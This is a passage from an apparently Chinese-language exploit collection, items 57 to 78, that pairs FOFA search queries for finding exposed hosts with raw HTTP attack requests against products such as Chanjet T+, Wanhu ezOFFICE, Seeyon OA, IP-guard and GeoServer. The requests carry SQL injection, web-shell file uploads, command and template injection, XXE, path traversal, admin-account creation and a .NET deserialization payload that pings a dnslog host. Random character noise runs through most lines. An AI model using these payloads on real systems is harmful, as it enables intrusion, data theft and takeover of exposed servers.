3 K3 J' T0 V1 h0 a: RPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1' Q8 |8 [9 P8 b$ e; T/ h1 Y# \
Host: x.x.x.x
0 g9 U# I# ~' r+ b" e) O% TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
) F2 x0 N9 I8 S5 P; v  o9 \Content-Type: application/json2 `7 A* p4 C( E0 x* K8 s

4 e$ _7 g1 Z3 \5 n7 T' T# I{
' m; p9 j+ A" j# A& T6 G  "storeID":{( ]& I) G; ~- G- A0 u9 j' i" c; {
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
+ a8 N7 K# t1 ]% u/ Q1 h, _6 b   "MethodName":"Start",, t3 A/ P4 e# n( K8 c# E
    "ObjectInstance":{& Y* q! F& L& y! `3 v
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
9 Y* `$ m- C7 I9 J        "StartInfo": {' \1 r+ F& x: d" }( \/ A4 q
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",1 i6 R* m4 d8 m" W; b- J3 ^
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
  ^+ {! l6 \7 ?( |. B/ |       }6 q  [4 [! T2 R* C' g
    }
  w3 P. x" y1 x: z  }/ N9 }5 B3 v+ A( l1 Y6 z% Z, e
}. h6 }8 Z+ b% j. j+ ?) Z5 D* p# T. Y
# f. z" h: L  t# u
* b2 _* [1 X# Q' f1 ~# E
57. 畅捷通T+ keyEdit.aspx SQL注入
. }/ s8 R4 P6 k; L" dFOFA:app="畅捷通-TPlus"
: B6 c3 T+ {. Q+ tGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
) n1 T5 P, J$ ^6 ^; H- V$ MHost: host
  e' V' S8 \; m, \8 Q9 I' FUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ O0 _5 N; B* R1 y% n
Accept-Charset: utf-8
$ X! O: H9 D6 }. A* n, H  M; xAccept-Encoding: gzip, deflate' H) j/ W" w+ \# E. d7 R  J6 O# P
Connection: close- }+ X/ V( V+ E- n7 l0 i4 S

1 t) d( _' h# U# [
' N) W# {# y2 S3 L8 g58. 畅捷通T+ KeyInfoList.aspx sql注入
0 G# v! o5 y4 L0 O# YFOFA:app="畅捷通-TPlus"6 ^, y% _! x; L- o) t9 r
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1' i/ s6 R7 {2 V  P
Host: your-ip
" o$ M  @3 L$ b; T$ R' ~' W% tUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! v" h- I7 k2 [- Q- C; B0 pAccept-Charset: utf-8" w; j3 @. o4 s
Accept-Encoding: gzip, deflate1 K, j( C% h3 F- x( z4 i# q6 W, n
Connection: close$ f1 E, _1 h4 I' F9 w, f& t  X  E
( v" g7 }) l( z5 s6 u
1 d  n: ]' K" a9 T& h4 a
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
0 P. Q6 K  A7 U. V" MFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
: Q' J" E( E) S5 [" t0 X2 aPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1/ m4 @! F- y3 Y0 s
Host: 192.168.86.128:9090
3 n/ @1 Q* ~0 G7 W& B0 ~$ P. TUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36% q& l0 Q1 q  p5 j# |8 p* ~5 W# Z
Connection: close
! E# O1 C/ H: Q/ oContent-Length: 1669' N% h7 t5 n# d3 u
Accept: */*
' ]/ |, ~' R$ L+ u) RAccept-Language: en
6 D4 C; q( g) k6 s' [Content-Type: application/x-www-form-urlencoded
/ m& r! b* i' HAccept-Encoding: gzip  w6 k" C8 l/ E5 m  ]# C! H5 }
3 ^: e5 t" p1 M/ V' {
PAYLOAD
: z+ y6 V; f, K; X5 W- x) P: A$ b" P: N$ `' ]

, n# R% |6 u; D$ [) @6 c' M60. 百卓Smart管理平台 importexport.php SQL注入
2 U2 Q/ m/ s/ r6 [( f; E, tFOFA:title="Smart管理平台"
5 R# R9 K+ }; `" lGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
, z0 X$ i& v& u9 b. Y- x$ G! P* |Host:
5 y8 ~: @6 J$ E: W) M9 Z, ]6 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ Z$ d  U5 b' n! ~' ]* E8 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 R( j2 z$ v: l) S. D. I( ~Accept-Encoding: gzip, deflate3 s* l. F8 D" J2 e
Accept-Language: zh-CN,zh;q=0.9
: w3 p' `- Z. @( JConnection: close
- W7 n8 B3 P' q* @  C9 R7 d0 j' `, m9 b9 L1 A

) L# M& b+ v( l4 V9 l, s61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
" W- C2 ?0 {! _9 i- iFOFA: title="欢迎使用浙大恩特客户资源管理系统"' d! m5 _- g1 b$ W
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1: @( u2 G$ f4 l" ]0 V, ^
Host: x.x.x.x1 `; U& \, f4 |: W" y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* P1 {. |+ U( d+ A" {' g/ F% {
Connection: close! X; t7 I8 |6 M
Content-Length: 27/ k' Z  X& \; Z8 q% _# ^* |
Accept: */*/ C* }4 R+ y4 Y8 |4 G3 b; K% P2 x0 h% m8 \4 _
Accept-Encoding: gzip, deflate+ v& F5 w$ N8 Y" F; W7 K* {/ X
Accept-Language: en0 k1 |" d. r% q. t7 o" m! X$ V7 }! x
Content-Type: application/x-www-form-urlencoded
$ B; m4 a8 n' o3 d+ P9 A9 n/ l- n5 L* @& E& F
8uxssX66eqrqtKObcVa0kid98xa
' s8 W5 E: S* b% B3 o( P
* w! a# l% ?/ R0 J" @
8 D) u% q# O, A- s9 H62. IP-guard WebServer 远程命令执行6 ]- l6 D( \% ^' B0 @: V
FOFA:"IP-guard" && icon_hash="2030860561"1 v- c  A$ ?- N% P+ a
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1# e' [4 y4 |3 ?8 S2 w( \
Host: x.x.x.x
2 `% L3 N: w5 K$ w$ f8 o3 {User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.367 d' A9 M4 G( `8 i6 `$ J
Connection: close( T6 f: k" w' s, f# K
Accept: */*! v5 P0 b: h3 V. b! t/ Q$ d5 l/ Q
Accept-Language: en* {& ]: ?; J. k2 d* l9 \
Accept-Encoding: gzip! X; w4 g  X8 _& s

# u5 c) `4 I4 r1 e. K, q8 k# k
4 g/ k8 l& }6 Z5 ]访问& S  ?' n! R" h
" |$ _. j2 T2 g4 b% _
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
9 ~! R2 _0 T; r4 P  c4 p2 ~Host: x.x.x.x$ E$ A/ ]( i4 _- n: l' \7 X7 V1 J
( `& g' F2 G: ]  l# R& M% g
8 F8 u6 p* Q1 ~" y9 z& y: f) J4 w
63. IP-guard WebServer任意文件读取& |& X1 ~" ~7 H& @7 o# D
IP-guard < 4.82.0609.0
$ Q8 z6 W$ n/ ?2 I6 N5 QFOFA:icon_hash="2030860561"
0 _4 D  m8 ^" ?, GPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
# n! E0 l5 G. IHost: your-ip: V" c! M! Y% T7 `7 X+ p7 u- m9 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
2 \& l' _' U" g8 d5 l: v' c5 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 M, Q0 W" x# b7 v, B' }Accept-Encoding: gzip, deflate
& T9 N) u% a4 v8 B0 l: D$ |/ z4 bAccept-Language: zh-CN,zh;q=0.9) j0 ?  f1 F! L/ m/ S& w
Connection: close
9 p) n0 H9 a& @% ZContent-Type: application/x-www-form-urlencoded
, [7 @5 i6 Q* Q5 L! v$ L2 s2 ]4 D8 Z1 I% K4 c2 ?# B4 ~* T
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
3 I; v' d- T) W& S& d3 x4 S6 Q
" i% k0 y$ F5 X8 X64. 捷诚管理信息系统CWSFinanceCommon SQL注入! `# m0 S' n; n3 ^$ W
FOFA:body="/Scripts/EnjoyMsg.js"
- X9 V# x- m7 @8 w4 bPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
) q7 ]3 A  Z! \3 DHost: 192.168.86.128:9001
6 L! Y# ]) \0 T% o3 Y8 mUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' V' A+ q$ @; E8 _& y
Connection: close
  F6 N) Z- ?# c+ f9 T& j$ JContent-Length: 3693 P% ?8 ?% p0 ~
Accept: */*
, t4 m$ v0 w2 `. v# B" gAccept-Language: en9 h; Y2 w; k0 D. m. {
Content-Type: text/xml; charset=utf-8
( R  I% s1 F7 C1 EAccept-Encoding: gzip9 F% c: T3 j- w' H8 X
! ^: t1 j% x, ~1 @/ e  o* U
<?xml version="1.0" encoding="utf-8"?>
. q1 P. N9 s- z<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
9 F  d7 @6 _: g) x* K1 Q. f<soap:Body>
9 E# r) H  P; [2 V    <GetOSpById xmlns="http://tempuri.org/">& N8 Y. e: T  b
      <sId>1';waitfor delay '0:0:5'--+</sId>! O' Q% l# a; u& b6 X5 {/ ]+ F
    </GetOSpById>/ T  j: J0 @2 Y* l
  </soap:Body>6 W0 v0 E6 s) _3 h+ w
</soap:Envelope>
! L  v2 N- c7 [3 v. w- N  ~5 u1 T/ t' h% z
1 t) y7 K* H! c# C) U# I; _! E+ s
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
5 S6 f' e: I$ ~' W" y2 E6 U/ NFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"* n" L+ ~( p  A% ]
响应200即成功创建账号test123456/123456
9 X; L4 j3 B6 ]# }. hPOST /SystemMng.ashx HTTP/1.1
2 ]7 G# |& q4 J1 o; c) JHost:( a3 T. k, m& K' ]9 z' D
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)- d$ z. g6 i4 w
Accept-Encoding: gzip, deflate3 x- {" }- Z6 A
Accept: */*( z# Y+ A8 F$ a: ?, H4 I4 J1 v
Connection: close
2 w* P1 e( [  e, d& {5 ]( V+ UAccept-Language: en
* k7 ~$ z: Y# {Content-Length: 174: W0 J! P1 d: x6 s; e$ X

+ ^# J+ j! x0 U! d8 m1 L- G3 aoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
* U. F) j6 L* K( Y, d$ ^2 p7 e
) N, I. |1 X$ M9 E- @7 X  b, D' H7 N5 _
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
$ P% V* X3 C- o! L! kFOFA:app="万户ezOFFICE协同管理平台"6 e* y3 u8 W+ R0 T
( O7 z' k" }- F4 V/ b
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
) ~# }. d1 M. M( S& h9 K9 q3 rHost: x.x.x.x; W9 [) ~. y# B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: v) C. }/ c+ n; H8 A4 w- y3 U+ rConnection: close$ k  E" n3 H* F% m* Q& p# p
Accept: */*# l2 P9 A# l# g
Accept-Language: en6 [. H+ H# l/ S/ A  z2 Y; V
Accept-Encoding: gzip
- e0 i" ~' }1 Q% C: f5 _! {6 z4 d# m* a; l: ^. ?

9 [# S- A8 F3 `第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
8 d6 R# E8 l# T4 o: G% m2 Q3 O7 A" }  z/ T; d- v
67. 万户ezOFFICE wpsservlet任意文件上传  b9 a" v- \0 |6 c
FOFA:app="万户网络-ezOFFICE"7 N( e- L  u8 k2 x0 h" v' E. |3 L
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型* w8 q) _* E& H/ ~5 ?$ x+ T; p2 `
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
9 A4 C1 H8 j2 e: s# a! yHost: x.x.x.x( i% L) D7 ~( {" C9 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
) N" ^' \4 b) ?) I  `Content-Length: 173) Z* \5 V# g6 K" e' V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
4 S. {* I, {0 e1 N0 i0 }7 hAccept-Encoding: gzip, deflate& E( J9 v! x  N/ f/ k
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.37 v' z( E$ ~% g; T; F! y1 b
Connection: close# H' q2 Q- d, O8 |
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
" {: `7 w2 \4 j& ZDNT: 1
; f. Y  F5 Z% [" Q% G, ^( A7 Z% bUpgrade-Insecure-Requests: 1
0 Q% g  Z. @+ |7 f/ T' Y& @9 T* C7 q8 T6 c+ B  c) O6 G
--ufuadpxathqvxfqnuyuqaozvseiueerp
6 x  o$ u5 V+ _+ ~& h5 a8 KContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
5 D( ?: B4 J) Y
* }2 l/ Q" _' h  S% k! [<% out.print("sasdfghjkj");%>; N# M8 T& g0 r4 F
--ufuadpxathqvxfqnuyuqaozvseiueerp--
" x- G, l1 P$ k: j! C( b% `  w1 g3 E$ B4 [4 j  F  c0 S4 U

1 b1 p& H9 f3 @& z  Z文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp/ ]& t( H4 H9 p  ^
3 N, w0 a6 g/ P. v
68. 万户ezOFFICE wf_printnum.jsp SQL注入$ a7 P2 _: \, I: R  v7 M
FOFA:app="万户ezOFFICE协同管理平台"
* ]- D9 Q$ J2 |0 n$ S1 PGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
' e8 w3 I+ N. G, Z2 X0 A  {! \8 AHost: {{host}}
: ?4 k# b. t0 r/ X1 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
2 E) }9 P0 o# _0 x) `+ Q# NAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
) d+ T/ A1 i  n7 [Accept-Encoding: gzip, deflate: l5 w, G1 A# }
Accept-Language: zh-CN,zh;q=0.91 X. B5 K9 i& j. j3 V
Connection: close% e$ C7 C% S8 K) S* a# S- z0 |0 }" c
  X" K( V6 A- n7 N3 j7 m+ X

5 u- c( f5 O" v# m. ]/ ?- v. m8 W8 L69. 万户 ezOFFICE contract_gd.jsp SQL注入
: p6 V3 ^6 J9 r; ^8 n9 g; [FOFA:app="万户ezOFFICE协同管理平台"; }! Y3 ]& c  u  R- O: i; ~; |# |
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
1 }9 \  v- x. F& t- O- HHost: your-ip
& P2 I' T1 |7 G8 G) [, }& IUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36/ [( R1 @. ^6 }! ]. n
Accept-Encoding: gzip, deflate
( z& U- L7 b8 A; PAccept: */*
( G- F+ P, h2 y1 K- [" AConnection: keep-alive2 r% N/ S/ _8 p0 h/ @# k
! n2 j+ M8 y& p0 f
/ y7 u& j5 _2 ?) v* R" Y2 g- B
70. 万户ezEIP success 命令执行
4 ^/ r8 G- D, W# h0 lFOFA:app="万户网络-ezEIP"
: `! R( V: `2 pPOST /member/success.aspx HTTP/1.1# o) |0 G( m( {9 [; f0 @; l
Host: {{Hostname}}
6 l; [6 z% i) G8 b# E8 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+ d+ R/ C: d2 y0 m, \* hSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
1 ]7 ~7 V, A' k, |9 j+ ]Content-Type: application/x-www-form-urlencoded6 T3 ]' P  Q5 s0 N$ F: v
TYPE: C
+ y8 Q! A8 L* c1 @9 h, DContent-Length: 167028 x7 x6 X+ w; k- h6 D

0 l( h/ l5 c8 ~+ [' g) S0 v__VIEWSTATE=PAYLOAD
* u" N0 X  ]: h+ g4 J: u- a) u6 U% d

  c' y/ F+ \6 w2 G( \71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
: _+ A' `' v" g! }% FFOFA:body="PM2项目管理系统BS版增强工具.zip", `. E) Y* M. `2 a4 d
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1! A$ `9 O9 b% h9 w+ y1 b: s
Host: x.x.x.xx.x.x.x) ?/ H. \2 a  `) _, p
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
' z" f0 J+ f& c/ N6 rConnection: close  @# `& C2 S3 [; w7 O  G" R8 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 _& D  r8 O. I$ t6 }: C" lAccept-Encoding: gzip, deflate" W  _$ W  S; C: e2 [2 F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: u1 F/ f' u& P2 F# PUpgrade-Insecure-Requests: 1
# w( ^# n: O5 V  @& |$ h; h  T. p( L8 A! N* [7 Y% s

# u2 i7 ^# i7 O, H. b! x$ v6 ]" Z8 W72. 致远OA getAjaxDataServlet XXE
) ~( d! b( j% j' ~' YFOFA:app="致远互联-OA"
  S8 z+ _0 h% ?POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1. }- A, g$ l  n/ w* R) d& S
Host: 192.168.40.131:8099
$ O; I. X' S4 X, B; G9 q  @& cUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36. u' F9 R6 C, {2 B9 `* I0 i
Connection: close
  s6 g2 o& t% y" ^1 S+ T) lContent-Length: 583
; h  U" F3 I, C/ X9 [Content-Type: application/x-www-form-urlencoded
8 Q# x0 ?7 M, I8 N1 t% o$ aAccept-Encoding: gzip% E2 x1 o4 v+ n& Q7 r3 U

' o9 ~- [% R4 y" N; D4 FS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
. }8 O; P- @. h! _5 K" V  z; ]0 m8 U+ A8 l1 L4 H+ I) k1 `. B

: C* n2 R) X3 q# m2 Q( P- W73. GeoServer wms远程代码执行
* B% S: D$ G" X3 `( f3 jFOFA:icon_hash=”97540678”
+ z" G% F$ t/ pPOST /geoserver/wms HTTP/1.19 F" Q  |0 x8 Y5 [8 |, ]: Y6 m
Host:  Q! B5 l8 J# ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36( [; v1 Z; \( `6 I) L
Content-Length: 19814 P1 o) P6 o- D7 w: Q  L
Accept-Encoding: gzip, deflate
6 y  C9 N+ J1 ~6 ~Connection: close3 T- z0 H2 E  d# B
Content-Type: application/xml
7 \6 M( j4 B3 i( b. gSL-CE-SUID: 38 G; E# `1 M" |2 x2 B# x5 k' I5 \" G5 a
0 W2 C# o" M3 R% D0 r
PAYLOAD/ y1 d, _1 a% O8 T

  V  D3 K* \8 [9 r- a) j3 S7 q! }- k& T, d/ g) u: F$ c/ g+ L
74. 致远M3-server 6_1sp1 反序列化RCE
' X: |3 ?* C" uFOFA:title="M3-Server"
' ~. t8 Z: w: j. G8 {# ZPAYLOAD
# q. I  }  l8 o  Q1 e- Z/ G
, o. M% n) v+ p75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE% k& I3 u: @  K6 e$ \! G% i, }
FOFA:app="TELESQUARE-TLR-2005KSH"
3 X; R: \& c" f+ G. vGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
# Q/ y& N; w5 |. W. i& @Host: x.x.x.x% v- Q' F' f3 u! i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! w2 W4 Q0 o" n& d
Connection: close
2 F" `/ Q9 J; Y) n! x% A* W0 G6 ]Accept: */*
) G7 h' p! C. e6 ^  h' WAccept-Language: en
) E4 p* d6 f  P$ t$ T; GAccept-Encoding: gzip% ?3 {  q3 _2 b( E0 O! ?: E

9 v0 D* B/ i/ T& D: D8 B8 V' y9 n1 s* t; c
GET /cgi-bin/test28256.txt HTTP/1.1& l0 u, B5 t: l2 G# U2 F
Host: x.x.x.x
' z$ M! m$ I1 g  I5 w4 r* `# m. K1 P0 v# k

- s& Q7 B5 i% j76. 新开普掌上校园服务管理平台service.action远程命令执行
! [% N  \  v  d2 X* k0 d4 aFOFA:title="掌上校园服务管理平台": s& A% O/ K9 l5 H: R# _, `/ l* A
POST /service_transport/service.action HTTP/1.1
* S: m* s' N1 _- u+ a4 KHost: x.x.x.x+ P0 Z4 M9 _6 t/ @" y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
' H& l; e2 R* N. Y  tConnection: close% z6 ], }9 u' g3 {4 s+ F: G
Content-Length: 211
9 i, q6 g4 z- cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 n; L/ k, q/ O' s, D3 T: @Accept-Encoding: gzip, deflate+ j5 f( p- j$ s9 M6 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# r* ^, @0 s4 QCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A44 f, ]) Y9 T2 ?+ Q  s" w' E7 J) u$ M
Upgrade-Insecure-Requests: 1
( G' c$ W: X/ ?- V2 ~+ O: q5 b1 G! y: V4 O1 f4 ?5 `
{
1 X* v9 a. j1 |5 V"command": "GetFZinfo",
7 w- \1 k( `; z% X6 I2 k/ ^  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
; A  u' ^" |+ _) I" J! V  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
  {+ p" _4 f  a/ A8 A! h}8 u, O; r2 a) V3 C4 ~# |1 z
/ g) s0 |& a- |3 V. o

( s, h3 f  [4 H. e) ^GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
3 D' M8 ~/ j# ]- u* oHost: x.x.x.x
3 f, v* r* p- u2 P
! y- t* Z: Y3 p) O4 @. t! i
6 L  \% _! M6 o" p
9 R- w: R/ x! S* w4 P* V4 o77. F22服装管理软件系统UploadHandler.ashx任意文件上传: N  q4 R  H' ]$ c7 d, m) H7 ~5 x
FOFA:body="F22WEB登陆") z: U2 V. M8 n3 p8 N
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.13 R) D, @6 w3 w
Host: x.x.x.x
6 u# `% s1 S  w8 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( G, N% G4 h; o# W2 o2 f5 ^* X& H6 dConnection: close% J0 G* H' N# i4 @6 b
Content-Length: 433
- p8 ]( b% @& _% CAccept: */*5 G- o0 D) [! @- C+ h( E
Accept-Encoding: gzip, deflate
3 n( h/ E% K* T1 q% aAccept-Language: zh-CN,zh;q=0.9
! I  X* F6 g# bContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix6 `! g0 @- b! r9 d' u

& z" k! p  {. `! P$ f* R8 B------------398jnjVTTlDVXHlE7yYnfwBoix# g+ [, ?/ J7 Z1 f! W% g4 c
Content-Disposition: form-data; name="folder"( x& ?6 T) e, ?7 i/ q
2 ]0 B% |. j0 E7 p. d
/upload/udplog5 D9 D+ i' F2 W8 x/ i# ^
------------398jnjVTTlDVXHlE7yYnfwBoix. ^; f2 _' b: \" z+ `9 v
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"+ T! k0 n# Q( Z7 e# {
Content-Type: application/octet-stream; N5 M6 u5 m/ E- a8 T& F6 ?+ Y9 l

/ n. o5 S% r; F0 w: W) p+ jhello1234567
( w2 v1 g- \0 S6 i4 T------------398jnjVTTlDVXHlE7yYnfwBoix
- P% |, t8 R2 L1 w) J9 ^Content-Disposition: form-data; name="Upload"
* J) ?1 h0 I+ S* S
1 p* D& X9 j2 C5 _+ aSubmit Query
4 k. K! v% e/ N5 C: \------------398jnjVTTlDVXHlE7yYnfwBoix--
- t& y; x1 u2 }2 T+ @/ c
# ?2 h! N% w7 f2 Z5 Y! E0 R- }8 _# W3 {) S" ]4 F! Q$ t+ A
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传8 p9 {& [* I. l/ z7 g  Q  G
FOFA:icon_hash="2001627082"
/ V4 w& {9 m- N  Y; z+ c* WPOST /Platform/System/FileUpload.ashx HTTP/1.1  x2 D$ L1 l1 z# b3 J
Host: x.x.x.x: ?1 W1 T) d5 X8 f4 S0 P: G, w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# O! A* W5 Y7 H% N9 \7 TConnection: close2 j; {) W- f3 r0 c0 x
Content-Length: 336
/ {9 \# f+ p! r# w9 G$ H; [, K/ O9 dAccept-Encoding: gzip
7 H" u. P5 @% h# R2 c+ _Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
